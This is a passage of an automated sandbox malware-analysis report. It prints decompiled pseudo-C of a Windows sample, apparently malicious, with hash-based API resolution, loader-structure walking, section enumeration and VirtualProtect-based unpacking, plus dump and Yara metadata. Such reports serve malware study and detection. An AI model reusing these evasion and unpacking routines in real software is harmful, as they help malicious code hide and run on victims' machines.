                                                                                                        									} else {
                                                                                                        										__eflags = _t535[0x54] - 0x45b68b68;
                                                                                                        										if(_t535[0x54] == 0x45b68b68) {
                                                                                                        											 *0x6e48d210 =  *_t535;
                                                                                                        										}
                                                                                                        									}
                                                                                                        									goto L78;
                                                                                                        								}
                                                                                                        								__eflags = _t241 - _t535[0x130];
                                                                                                        								if(_t241 >= _t535[0x130]) {
                                                                                                        									goto L57;
                                                                                                        								}
                                                                                                        								_t535[0x130] =  &(_t535[0x58]);
                                                                                                        								_t261 = E6E47E8A8( &(_t535[0x58]), 0x7fffffff);
                                                                                                        								_t477 =  &(_t535[0x12c]);
                                                                                                        								 *_t477 = _t261;
                                                                                                        								_t477[2] = _t261 + 1;
                                                                                                        								_t395 = E6E48306C(0x60a28c5c, 0x522ec1f2, 0x60a28c5c, 0x60a28c5c);
                                                                                                        								__eflags = _t395;
                                                                                                        								if(_t395 != 0) {
                                                                                                        									_t202 =  &(_t535[0x12c]); // 0x100
                                                                                                        									 *_t395(_t535[0xc], _t202, 0,  &(_t535[0x2c]));
                                                                                                        								}
                                                                                                        								 *_t535 = _t535[0x2c];
                                                                                                        								goto L58;
                                                                                                        							}
                                                                                                        							goto L50;
                                                                                                        						} else {
                                                                                                        							goto L48;
                                                                                                        						}
                                                                                                        						do {
                                                                                                        							L48:
                                                                                                        							_t467 = _t467 + 1;
                                                                                                        							_t270 =  *((intOrPtr*)(_t467 + _t387));
                                                                                                        							_t535[_t467 + 0x58] = _t270;
                                                                                                        						} while (_t270 != 0);
                                                                                                        						goto L49;
                                                                                                        						L50:
                                                                                                        						_t524 = _t524 + 4;
                                                                                                        						_t396 =  &(_t535[0x12c]);
                                                                                                        						_t373 =  &(_t373[1]);
                                                                                                        						_t269 =  *_t396 + 1;
                                                                                                        						 *_t396 = _t269;
                                                                                                        					} while (_t269 <  *((intOrPtr*)(_t510 +  *_t535 + 0x18)));
                                                                                                        					goto L77;
                                                                                                        				} else {
                                                                                                        					_t535[0x30] = 0;
                                                                                                        					 *0x6e48d2e4 = 1;
                                                                                                        					E6E47F584( &(_t535[0x38]), 0);
                                                                                                        					E6E47F584( &(_t535[0x168]), 0x1c);
                                                                                                        					_t535[0x58] = E6E47F4BC( &(_t535[0x168]), 0);
                                                                                                        					_t400 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc));
                                                                                                        					_t535[0x48] =  *(_t400 + 0xc);
                                                                                                        					_t535[0x60] =  *(_t400 + 0x10);
                                                                                                        					goto L5;
                                                                                                        					L6:
                                                                                                        					_t384 = 0;
                                                                                                        					do {
                                                                                                        						if(( *(_t529 + 0x24) & 0x20000000) == 0) {
                                                                                                        							goto L13;
                                                                                                        						}
                                                                                                        						_t513 =  *((intOrPtr*)(_t529 + 0xc)) + _t535[0x58] +  *((intOrPtr*)(_t529 + 8));
                                                                                                        						_t496 = E6E48306C(0x60a28c5c, 0xe7942190, _t279, _t279);
                                                                                                        						if(_t496 == 0) {
                                                                                                        							L10:
                                                                                                        							_t456 = _t535[0x50];
                                                                                                        							_t497 =  *((intOrPtr*)(_t529 + 0xc));
                                                                                                        							_t498 = _t497 + _t456;
                                                                                                        							_t500 =  *((intOrPtr*)(_t529 + 8));
                                                                                                        							_t535[0x28] = _t498;
                                                                                                        							_t499 = _t498 + _t500;
                                                                                                        							_t363 =  *(_t535[0x58]) - _t456 - _t497 - _t500 -  *((intOrPtr*)(_t535[0x58] + 0xc));
                                                                                                        							_t535[0x24] = _t529;
                                                                                                        							_t535[0x20] =  *(_t535[0x48] + 0x30);
                                                                                                        							if((_t499 & 0x00000003) == 0) {
                                                                                                        								L12:
                                                                                                        								_t535[0x1c] = _t363;
                                                                                                        								_t535[0x18] = _t499;
                                                                                                        								E6E47F828( &(_t535[0xc]), E6E47F4CC( &(_t535[8])) + 0x14);
                                                                                                        								_t369 = E6E47F4BC( &(_t535[0xc]), E6E47F4CC( &(_t535[8])) + 0xffffffec);
                                                                                                        								_t462 = 5;
                                                                                                        								_t279 = memcpy(_t369,  &(_t535[0x18]), _t462 << 2);
                                                                                                        								_t535 =  &(_t535[0xc]);
                                                                                                        								_t535[4] = _t535[4] + 1;
                                                                                                        								goto L13;
                                                                                                        							} else {
                                                                                                        								goto L11;
                                                                                                        							}
                                                                                                        							do {
                                                                                                        								L11:
                                                                                                        								_t499 = _t499 + 1;
                                                                                                        								_t363 = _t363 - 1;
                                                                                                        							} while ((_t499 & 0x00000003) != 0);
                                                                                                        							goto L12;
                                                                                                        						}
                                                                                                        						_t279 =  *_t496(0xffffffff, _t513, 0, _t535[0x60], 0x1c, 0);
                                                                                                        						if(0 < 0) {
                                                                                                        							goto L13;
                                                                                                        						}
                                                                                                        						goto L10;
                                                                                                        						L13:
                                                                                                        						_t384 = _t384 + 1;
                                                                                                        						_t529 = _t529 + 0x28;
                                                                                                        					} while (_t384 < _t535[0x5c]);
                                                                                                        					L14:
                                                                                                        					_t280 = _t535[4];
                                                                                                        					_t535[0x44] = _t280;
                                                                                                        					if(_t280 <= 1) {
                                                                                                        						L21:
                                                                                                        						if(_t535[0x44] <= 0) {
                                                                                                        							L24:
                                                                                                        							_t281 = _t535[0x48];
                                                                                                        							_t556 = _t281 - _t535[0x60];
                                                                                                        							if(_t281 != _t535[0x60]) {
                                                                                                        								_t535[0x48] =  *_t281;
                                                                                                        								E6E47F654( &(_t535[8]));
                                                                                                        								L5:
                                                                                                        								_t277 =  *(_t535[0x48] + 0x18);
                                                                                                        								_t535[0x50] = _t277;
                                                                                                        								_t535[4] = 0;
                                                                                                        								_t379 =  *((intOrPtr*)(_t277 + 0x3c)) + _t277;
                                                                                                        								E6E47F584( &(_t535[0xc]), 0);
                                                                                                        								_t279 =  *(_t379 + 6) & 0x0000ffff;
                                                                                                        								_t535[0x5c] = _t279;
                                                                                                        								_t529 = _t379 + ( *(_t379 + 0x14) & 0x0000ffff) + 0x18;
                                                                                                        								if(_t279 <= 0) {
                                                                                                        									goto L14;
                                                                                                        								}
                                                                                                        								goto L6;
                                                                                                        							}
                                                                                                        							E6E47F654( &(_t535[8]));
                                                                                                        							E6E47F654( &(_t535[0x164]));
                                                                                                        							E6E47F584( &(_t535[0x48]), 0);
                                                                                                        							_t535[0x18] = 0;
                                                                                                        							E6E47F584( &(_t535[0x20]), 0);
                                                                                                        							_push(0x60a28c5c);
                                                                                                        							_t289 = E6E481D34(0x60a28c5c);
                                                                                                        							_t290 = E6E4812EC( &(_t535[0x154]), _t517, _t556);
                                                                                                        							_push(_t290);
                                                                                                        							_push(_t290);
                                                                                                        							E6E481C6C( &(_t535[0x164]), 0x60a28c5c);
                                                                                                        							_t518 =  &(_t535[0x178]);
                                                                                                        							E6E47D014( &(_t535[0x178]) - 0x24,  &(_t535[0x178]), _t535[0x15c]);
                                                                                                        							_push(0x80);
                                                                                                        							_push(0);
                                                                                                        							E6E485CD4( &(_t535[0x114]), _t556, _t535[0x184], 1);
                                                                                                        							E6E485D08( &(_t535[0x180]) - 0x7c, _t556,  &(_t535[0x180]), 0);
                                                                                                        							_push(_t289);
                                                                                                        							E6E488E08( &(_t535[0xe4]),  &(_t535[0x180]), 2);
                                                                                                        							E6E47F654( &(_t535[0x180]));
                                                                                                        							_t557 = _t535[0x114];
                                                                                                        							if(_t535[0x114] != 0) {
                                                                                                        								E6E47BB44( &(_t535[0x110]));
                                                                                                        							}
                                                                                                        							E6E47CFDC( &(_t535[0x104]));
                                                                                                        							E6E47CFDC(_t518);
                                                                                                        							E6E47CFDC( &(_t535[0x15c]));
                                                                                                        							E6E47CFDC( &(_t535[0x154]));
                                                                                                        							E6E4890EC( &(_t535[0xdc]), 0xffffffff);
                                                                                                        							_t535[0x118] = _t535[0xf0];
                                                                                                        							E6E47F618( &(_t535[0x11c]), _t557,  &(_t535[0xf4]));
                                                                                                        							_push(1);
                                                                                                        							E6E4890B0( &(_t535[0x11c]));
                                                                                                        							_t381 = 0;
                                                                                                        							_t535[0x64] = 0;
                                                                                                        							_t535[0x60] = 0;
                                                                                                        							do {
                                                                                                        								_t535[0x58] = E6E47F4BC( &(_t535[0x38]), _t535[0x60]);
                                                                                                        								_t535[0x70] = E6E47F4CC( &(_t535[0x44]));
                                                                                                        								_t519 =  *(0x6e48bd40 + _t381 * 4);
                                                                                                        								_t531 = E6E48907C( &(_t535[0xf4]), _t519, _t519);
                                                                                                        								if(_t531 == 0) {
                                                                                                        									goto L42;
                                                                                                        								}
                                                                                                        								_t508 = E6E4887E8( &(_t535[0x11c]), _t519,  *_t531);
                                                                                                        								_t532 =  *_t531;
                                                                                                        								while(_t532 ==  *_t508) {
                                                                                                        									_t508 = _t508 + 8;
                                                                                                        									__eflags = _t508;
                                                                                                        								}
                                                                                                        								_t315 =  *_t508;
                                                                                                        								_t535[0x74] = _t315;
                                                                                                        								_t535[0x78] = _t315 - _t532;
                                                                                                        								if(_t381 != 0) {
                                                                                                        									L38:
                                                                                                        									_t535[0x68] = E6E47F4CC( &(_t535[0x44]));
                                                                                                        									_t535[0x6c] = _t519;
                                                                                                        									E6E47F4DC( &(_t535[0x4c]), _t562, _t532, _t535[0x78]);
                                                                                                        									_t319 = E6E47F4CC( &(_t535[0x44]));
                                                                                                        									_t487 = _t535[0x58];
                                                                                                        									_t563 = _t319 -  *((intOrPtr*)(_t487 + 4));
                                                                                                        									if(_t319 <=  *((intOrPtr*)(_t487 + 4))) {
                                                                                                        										E6E47F828( &(_t535[0x20]), E6E47F4CC( &(_t535[0x1c])) + 8);
                                                                                                        										E6E47F4BC( &(_t535[0x20]), E6E47F4CC( &(_t535[0x1c])) + 0xfffffff8);
                                                                                                        										asm("movsd");
                                                                                                        										asm("movsd");
                                                                                                        										_t535[0x18] = _t535[0x18] + 1;
                                                                                                        										__eflags = _t381 - 0x1d;
                                                                                                        										if(__eflags == 0) {
                                                                                                        											_t228 =  &(_t535[0x44]); // 0x2c
                                                                                                        											E6E48317C(_t535[0x58], _t228, __eflags,  &(_t535[0x18]));
                                                                                                        										}
                                                                                                        										goto L42;
                                                                                                        									}
                                                                                                        									E6E47F828( &(_t535[0x48]), _t535[0x70]);
                                                                                                        									E6E48317C(_t535[0x58],  &(_t535[0x44]), _t563,  &(_t535[0x18]));
                                                                                                        									E6E47F840( &(_t535[0x44]), _t563);
                                                                                                        									E6E47F840( &(_t535[0x1c]), _t563);
                                                                                                        									_t381 = _t381 - 1;
                                                                                                        									_t334 = _t535[0x64] + 1;
                                                                                                        									_t535[0x60] = _t535[0x60] + 0x14;
                                                                                                        									_t535[0x18] = 0;
                                                                                                        									_t535[0x64] = _t334;
                                                                                                        									if(_t334 == _t535[0x30]) {
                                                                                                        										break;
                                                                                                        									}
                                                                                                        									goto L42;
                                                                                                        								}
                                                                                                        								E6E48913C( &(_t535[0x134]), _t519);
                                                                                                        								_t535[0x5c] = _t532;
                                                                                                        								while(1) {
                                                                                                        									_t336 = _t535[0x5c];
                                                                                                        									_t562 =  *_t336 - 0xb8;
                                                                                                        									if( *_t336 == 0xb8) {
                                                                                                        										break;
                                                                                                        									}
                                                                                                        									_t490 = _t535[0x5c] + E6E489104( &(_t535[0x138]), __eflags, _t535[0x74]);
                                                                                                        									_t535[0x5c] = _t490;
                                                                                                        									__eflags = _t490 -  *_t508;
                                                                                                        									if(__eflags < 0) {
                                                                                                        										continue;
                                                                                                        									}
                                                                                                        									L37:
                                                                                                        									E6E47F654( &(_t535[0x144]));
                                                                                                        									E6E47F654( &(_t535[0x134]));
                                                                                                        									goto L38;
                                                                                                        								}
                                                                                                        								 *0x6e48d2ec =  *((intOrPtr*)(_t336 + 1));
                                                                                                        								goto L37;
                                                                                                        								L42:
                                                                                                        								_t381 = _t381 + 1;
                                                                                                        							} while (_t381 < 0x1e);
                                                                                                        							E6E47F654( &(_t535[0x11c]));
                                                                                                        							E6E488E68(_t381,  &(_t535[0xd8]));
                                                                                                        							E6E47F654( &(_t535[0x1c]));
                                                                                                        							E6E47F654( &(_t535[0x44]));
                                                                                                        							E6E47F654( &(_t535[0x34]));
                                                                                                        							goto L44;
                                                                                                        						}
                                                                                                        						_t533 = 0;
                                                                                                        						_t382 = 0;
                                                                                                        						do {
                                                                                                        							_t341 = E6E47F4BC( &(_t535[0xc]), _t382);
                                                                                                        							_t517 = _t341;
                                                                                                        							E6E47F828( &(_t535[0x38]), E6E47F4CC( &(_t535[0x34])) + 0x14);
                                                                                                        							_t347 = E6E47F4BC( &(_t535[0x38]), E6E47F4CC( &(_t535[0x34])) + 0xffffffec);
                                                                                                        							_t451 = 5;
                                                                                                        							memcpy(_t347, _t341, _t451 << 2);
                                                                                                        							_t535 =  &(_t535[0xc]);
                                                                                                        							_t533 = _t533 + 1;
                                                                                                        							_t382 = _t382 + 0x14;
                                                                                                        							_t535[0x30] = _t535[0x30] + 1;
                                                                                                        						} while (_t533 < _t535[0x44]);
                                                                                                        						goto L24;
                                                                                                        					}
                                                                                                        					_t535[0x4c] = 1;
                                                                                                        					_t534 = 0x14;
                                                                                                        					do {
                                                                                                        						_t62 = _t534 - 0x14; // 0x0
                                                                                                        						_t383 = E6E47F4BC( &(_t535[0xc]), _t62);
                                                                                                        						_t455 = E6E47F4BC( &(_t535[0xc]), _t534);
                                                                                                        						_t517 =  *_t383;
                                                                                                        						_t352 =  *_t455;
                                                                                                        						if(_t352 >= _t517 && _t352 <= _t383[1] + _t517) {
                                                                                                        							_t383[1] =  *((intOrPtr*)(_t455 + 0x10)) - _t517;
                                                                                                        						}
                                                                                                        						_t534 = _t534 + 0x14;
                                                                                                        						_t354 = _t535[0x4c] + 1;
                                                                                                        						_t535[0x4c] = _t354;
                                                                                                        					} while (_t354 < _t535[0x44]);
                                                                                                        					_t535[0x44] = _t535[4];
                                                                                                        					goto L21;
                                                                                                        				}
                                                                                                        			}








































































                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e48158e
                                                                                                        0x6e48158e
                                                                                                        0x6e48158e
                                                                                                        0x6e48158f
                                                                                                        0x6e481590
                                                                                                        0x00000000
                                                                                                        0x6e48158e
                                                                                                        0x6e481553
                                                                                                        0x6e481557
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e4815d8
                                                                                                        0x6e4815d8
                                                                                                        0x6e4815d9
                                                                                                        0x6e4815dc
                                                                                                        0x6e4815e6
                                                                                                        0x6e4815e6
                                                                                                        0x6e4815ea
                                                                                                        0x6e4815f1
                                                                                                        0x6e48164c
                                                                                                        0x6e481651
                                                                                                        0x6e4816a4
                                                                                                        0x6e4816a4
                                                                                                        0x6e4816a8
                                                                                                        0x6e4816ac
                                                                                                        0x6e4814d6
                                                                                                        0x6e4814d9
                                                                                                        0x6e4814de
                                                                                                        0x6e4814e4
                                                                                                        0x6e4814e7
                                                                                                        0x6e4814ee
                                                                                                        0x6e4814f2
                                                                                                        0x6e4814f9
                                                                                                        0x6e481502
                                                                                                        0x6e481506
                                                                                                        0x6e48150a
                                                                                                        0x6e481510
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e481510
                                                                                                        0x6e4816b6
                                                                                                        0x6e4816c2
                                                                                                        0x6e4816cd
                                                                                                        0x6e4816d4
                                                                                                        0x6e4816dd
                                                                                                        0x6e4816e7
                                                                                                        0x6e4816e8
                                                                                                        0x6e4816f6
                                                                                                        0x6e4816fb
                                                                                                        0x6e4816fc
                                                                                                        0x6e481709
                                                                                                        0x6e48170e
                                                                                                        0x6e481720
                                                                                                        0x6e481725
                                                                                                        0x6e48172a
                                                                                                        0x6e48173c
                                                                                                        0x6e48174e
                                                                                                        0x6e481753
                                                                                                        0x6e48175e
                                                                                                        0x6e481765
                                                                                                        0x6e48176a
                                                                                                        0x6e481772
                                                                                                        0x6e48177b
                                                                                                        0x6e48177b
                                                                                                        0x6e481787
                                                                                                        0x6e48178e
                                                                                                        0x6e48179a
                                                                                                        0x6e4817a6
                                                                                                        0x6e4817b4
                                                                                                        0x6e4817c5
                                                                                                        0x6e4817cc
                                                                                                        0x6e4817d1
                                                                                                        0x6e4817da
                                                                                                        0x6e4817df
                                                                                                        0x6e4817e1
                                                                                                        0x6e4817e5
                                                                                                        0x6e4817e9
                                                                                                        0x6e4817f6
                                                                                                        0x6e481803
                                                                                                        0x6e481807
                                                                                                        0x6e48181b
                                                                                                        0x6e48181f
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e481834
                                                                                                        0x6e481836
                                                                                                        0x6e48183e
                                                                                                        0x6e48183b
                                                                                                        0x6e48183b
                                                                                                        0x6e48183b
                                                                                                        0x6e481842
                                                                                                        0x6e481844
                                                                                                        0x6e48184a
                                                                                                        0x6e481850
                                                                                                        0x6e4818ac
                                                                                                        0x6e4818b5
                                                                                                        0x6e4818b9
                                                                                                        0x6e4818c6
                                                                                                        0x6e4818cf
                                                                                                        0x6e4818d4
                                                                                                        0x6e4818d8
                                                                                                        0x6e4818db
                                                                                                        0x6e48193c
                                                                                                        0x6e481952
                                                                                                        0x6e48195d
                                                                                                        0x6e48195e
                                                                                                        0x6e48195f
                                                                                                        0x6e481963
                                                                                                        0x6e481966
                                                                                                        0x6e481be6
                                                                                                        0x6e481be9
                                                                                                        0x6e481be9
                                                                                                        0x00000000
                                                                                                        0x6e481966
                                                                                                        0x6e4818e5
                                                                                                        0x6e4818f5
                                                                                                        0x6e4818fe
                                                                                                        0x6e481907
                                                                                                        0x6e481910
                                                                                                        0x6e481911
                                                                                                        0x6e481912
                                                                                                        0x6e481917
                                                                                                        0x6e48191f
                                                                                                        0x6e481927
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e481929
                                                                                                        0x6e481859
                                                                                                        0x6e48185e
                                                                                                        0x6e481862
                                                                                                        0x6e481862
                                                                                                        0x6e481866
                                                                                                        0x6e481869
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e48188a
                                                                                                        0x6e48188c
                                                                                                        0x6e481890
                                                                                                        0x6e481892
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x6e481894
                                                                                                        0x6e48189b
                                                                                                        0x6e4818a7
                                                                                                        0x00000000
                                                                                                        0x6e4818a7
                                                                                                        0x6e48186e
                                                                                                        0x00000000
                                                                                                        0x6e48196c
                                                                                                        0x6e48196c
                                                                                                        0x6e48196d
                                                                                                        0x6e48197d
                                                                                                        0x6e481989
                                                                                                        0x6e481992
                                                                                                        0x6e48199b
                                                                                                        0x6e4819a4
                                                                                                        0x00000000
                                                                                                        0x6e4819a4
                                                                                                        0x6e481653
                                                                                                        0x6e481655
                                                                                                        0x6e481657
                                                                                                        0x6e48165c
                                                                                                        0x6e481661
                                                                                                        0x6e481674
                                                                                                        0x6e48168a
                                                                                                        0x6e481693
                                                                                                        0x6e481694
                                                                                                        0x6e481694
                                                                                                        0x6e481696
                                                                                                        0x6e481697
                                                                                                        0x6e48169a
                                                                                                        0x6e48169e
                                                                                                        0x00000000
                                                                                                        0x6e481657
                                                                                                        0x6e4815f3
                                                                                                        0x6e4815fd
                                                                                                        0x6e4815fe
                                                                                                        0x6e4815fe
                                                                                                        0x6e48160b
                                                                                                        0x6e481617
                                                                                                        0x6e481619
                                                                                                        0x6e48161b
                                                                                                        0x6e48161f
                                                                                                        0x6e48162f
                                                                                                        0x6e48162f
                                                                                                        0x6e481636
                                                                                                        0x6e481639
                                                                                                        0x6e48163a
                                                                                                        0x6e48163e
                                                                                                        0x6e481648
                                                                                                        0x00000000
                                                                                                        0x6e481648

                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, Offset: 6E470000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1054027780.000000006E470000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054127041.000000006E48A000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054184258.000000006E48D000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054198576.000000006E48F000.00000002.00020000.sdmp
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • Opcode ID: 31df2b1e2c1e0db0d10a87b2025410e42c6550bc536479e0a1079b00beefcb6b
                                                                                                        • Instruction ID: 295092414e4faf118b0ae096606ca3dec8d6e673512e8f67e6fede03cf08e647
                                                                                                        • Opcode Fuzzy Hash: 31df2b1e2c1e0db0d10a87b2025410e42c6550bc536479e0a1079b00beefcb6b
                                                                                                        • Instruction Fuzzy Hash: 3B3238705083458FD724DFB4C890EDBB7E8AF95304F10892FE5A5972A1EB70E949CB92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 100%
                                                                                                        			E6E476D0C() {
                                                                                                        
                                                                                                        				 *0x6e48d280 = GetUserNameW;
                                                                                                        				 *0x6E48D284 = MessageBoxW;
                                                                                                        				 *0x6E48D288 = GetLastError;
                                                                                                        				 *0x6E48D28C = CreateFileA;
                                                                                                        				 *0x6E48D290 = DebugBreak;
                                                                                                        				 *0x6E48D294 = FlushFileBuffers;
                                                                                                        				 *0x6E48D298 = FreeEnvironmentStringsA;
                                                                                                        				 *0x6E48D29C = GetConsoleOutputCP;
                                                                                                        				 *0x6E48D2A0 = GetEnvironmentStrings;
                                                                                                        				 *0x6E48D2A4 = GetLocaleInfoA;
                                                                                                        				 *0x6E48D2A8 = GetStartupInfoA;
                                                                                                        				 *0x6E48D2AC = GetStringTypeA;
                                                                                                        				 *0x6E48D2B0 = HeapValidate;
                                                                                                        				 *0x6E48D2B4 = IsBadReadPtr;
                                                                                                        				 *0x6E48D2B8 = LCMapStringA;
                                                                                                        				 *0x6E48D2BC = LoadLibraryA;
                                                                                                        				 *0x6E48D2C0 = OutputDebugStringA;
                                                                                                        				return 0x6e48d280;
                                                                                                        			}




                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, Offset: 6E470000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1054027780.000000006E470000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054127041.000000006E48A000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054184258.000000006E48D000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054198576.000000006E48F000.00000002.00020000.sdmp
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • Opcode ID: 2bea2e6354e64ab14aa44fe9b98b011215bbc41045b8b8d44308983a7e8c326c
                                                                                                        • Instruction ID: 33c313b62a0f21567bb20ea0a6ac9a4a78c10b0e0622b5d319071c2e89037bd2
                                                                                                        • Opcode Fuzzy Hash: 2bea2e6354e64ab14aa44fe9b98b011215bbc41045b8b8d44308983a7e8c326c
                                                                                                        • Instruction Fuzzy Hash: FB1102B4905A00CF8788EF29E1948127BF1BF8F314B1181AED9094B3A5D7B4D845EF54
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        C-Code - Quality: 65%
                                                                                                        			E6E47BB44(intOrPtr* __ecx) {
                                                                                                        				void* _t1;
                                                                                                        				void* _t2;
                                                                                                        				intOrPtr* _t4;
                                                                                                        
                                                                                                        				_t4 = __ecx;
                                                                                                        				_t1 = E6E47C280(__ecx);
                                                                                                        				if(_t1 == 0) {
                                                                                                        					_t2 = E6E483064(0x60a28c5c, 0xe96b154c);
                                                                                                        					if(_t2 != 0) {
                                                                                                        						_push( *_t4);
                                                                                                        						asm("int3");
                                                                                                        						asm("int3");
                                                                                                        					}
                                                                                                        					 *_t4 = 0;
                                                                                                        					return _t2;
                                                                                                        				}
                                                                                                        				return _t1;
                                                                                                        			}







                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1054100443.000000006E471000.00000020.00020000.sdmp, Offset: 6E470000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1054027780.000000006E470000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054127041.000000006E48A000.00000002.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054184258.000000006E48D000.00000004.00020000.sdmp
                                                                                                        • Associated: 00000000.00000002.1054198576.000000006E48F000.00000002.00020000.sdmp
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • Opcode ID: 07604e7cfcd7805719c03ee9caa2803b83987aefb0ef9c1b2756fd2519e18e65
                                                                                                        • Instruction ID: cddb87aa96b412fabb43dc9e8ed8d7197d3c4d4dc6bc6cb68f22c3f59c236921
                                                                                                        • Opcode Fuzzy Hash: 07604e7cfcd7805719c03ee9caa2803b83987aefb0ef9c1b2756fd2519e18e65
                                                                                                        • Instruction Fuzzy Hash: 7FD0123580020635EF641AF5B810F959BA95F81298F640C2BED006B95DFFB5D46145A4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Executed Functions

                                                                                                        C-Code - Quality: 42%
                                                                                                        			E005B11ED(long __ebx, void* __edi, long __esi, intOrPtr* _a4) {
                                                                                                        				intOrPtr _v20;
                                                                                                        				intOrPtr _v24;
                                                                                                        				intOrPtr _v28;
                                                                                                        				intOrPtr _v32;
                                                                                                        				intOrPtr _v36;
                                                                                                        				char _v40;
                                                                                                        				char _v44;
                                                                                                        				intOrPtr* _v48;
                                                                                                        				intOrPtr _v52;
                                                                                                        				intOrPtr _v56;
                                                                                                        				intOrPtr _v60;
                                                                                                        				intOrPtr _v64;
                                                                                                        				void* _v68;
                                                                                                        				char* _v72;
                                                                                                        				int _v76;
                                                                                                        				long _v80;
                                                                                                        				long _v84;
                                                                                                        				DWORD* _v88;
                                                                                                        				intOrPtr _v92;
                                                                                                        				int _v96;
                                                                                                        				intOrPtr* _v100;
                                                                                                        				intOrPtr _v104;
                                                                                                        				intOrPtr _v108;
                                                                                                        				void* _v112;
                                                                                                        				intOrPtr _v116;
                                                                                                        				char* _v120;
                                                                                                        				intOrPtr _v124;
                                                                                                        				intOrPtr _v128;
                                                                                                        				intOrPtr _v132;
                                                                                                        				intOrPtr _v136;
                                                                                                        				intOrPtr _v140;
                                                                                                        				intOrPtr _v144;
                                                                                                        				intOrPtr _v148;
                                                                                                        				intOrPtr _v152;
                                                                                                        				intOrPtr _v156;
                                                                                                        				signed int _v160;
                                                                                                        				signed int _v164;
                                                                                                        				intOrPtr _v168;
                                                                                                        				int _v172;
                                                                                                        				char* _v176;
                                                                                                        				intOrPtr _v180;
                                                                                                        				intOrPtr _v184;
                                                                                                        				char _v188;
                                                                                                        				intOrPtr* _t137;
                                                                                                        				int _t143;
                                                                                                        				int _t151;
                                                                                                        				int _t155;
                                                                                                        				int _t182;
                                                                                                        				unsigned int _t199;
                                                                                                        				intOrPtr _t221;
                                                                                                        				intOrPtr _t223;
                                                                                                        				void* _t231;
                                                                                                        				intOrPtr _t234;
                                                                                                        				void* _t241;
                                                                                                        				intOrPtr _t245;
                                                                                                        				intOrPtr _t252;
                                                                                                        				DWORD* _t265;
                                                                                                        				void* _t269;
                                                                                                        				intOrPtr* _t272;
                                                                                                        				intOrPtr* _t273;
                                                                                                        
                                                                                                        				_t137 = _a4;
                                                                                                        				_v44 = 0;
                                                                                                        				_t241 =  *((intOrPtr*)(_t137 + 0x38));
                                                                                                        				 *0x5b4418 = 1;
                                                                                                        				asm("movaps xmm0, [0x5b3010]");
                                                                                                        				asm("movups [0x5b4428], xmm0");
                                                                                                        				_v48 = _t137;
                                                                                                        				_v52 =  *((intOrPtr*)(_t137 + 0x20));
                                                                                                        				_v56 =  *((intOrPtr*)(_v48 + 0x1c));
                                                                                                        				_v188 = _t241;
                                                                                                        				_v184 =  *((intOrPtr*)(_t137 + 0x18));
                                                                                                        				_v180 = 4;
                                                                                                        				_v176 =  &_v44;
                                                                                                        				_v60 =  *((intOrPtr*)(_v48 + 0xc));
                                                                                                        				_v64 = 4;
                                                                                                        				_v68 = _t241;
                                                                                                        				_v72 =  &_v44;
                                                                                                        				_t143 = VirtualProtect(__edi, __ebx, __esi, _t265); // executed
                                                                                                        				_v76 = _t143;
                                                                                                        				_v188 = _v68;
                                                                                                        				_v184 = 0;
                                                                                                        				_v180 =  *((intOrPtr*)(_v48 + 0x18));
                                                                                                        				_v80 = 0x400;
                                                                                                        				_v84 = 2;
                                                                                                        				_v88 =  &_v44;
                                                                                                        				_v92 = 0;
                                                                                                        				E005B2798();
                                                                                                        				E005B17A5(_v68,  *_v48, _v52);
                                                                                                        				E005B2798( *_v48, 0, _v52);
                                                                                                        				_t151 = VirtualProtect(_v68, 0x400, 2, _v88); // executed
                                                                                                        				_t272 = _t269 - 0x8c;
                                                                                                        				_t231 = _v68;
                                                                                                        				_t252 =  *((intOrPtr*)(_t231 + 0x3c));
                                                                                                        				_v96 = _t151;
                                                                                                        				_v100 = _v68 + 0x3c;
                                                                                                        				_v104 = _t231;
                                                                                                        				_v108 = _t252;
                                                                                                        				if(_t252 != 0) {
                                                                                                        					_v104 = _v68 + (_v108 + 0x0000ffff & 0x0000ffff) + 1;
                                                                                                        				}
                                                                                                        				_v144 = _v104;
                                                                                                        				if(_v60 != 0) {
                                                                                                        					_v148 = _v144 + 0x18 + ( *(_v144 + 0x14) & 0x0000ffff);
                                                                                                        					_v152 = 0;
                                                                                                        					while(1) {
                                                                                                        						_t221 = _v148;
                                                                                                        						_t199 =  *(_t221 + 0x24);
                                                                                                        						_v156 = _v152;
                                                                                                        						_v160 = _t199 >> 0x0000001e & 0x00000001;
                                                                                                        						_v164 = _t199 >> 0x1f;
                                                                                                        						_v188 = _v68 +  *((intOrPtr*)(_t221 + 0xc));
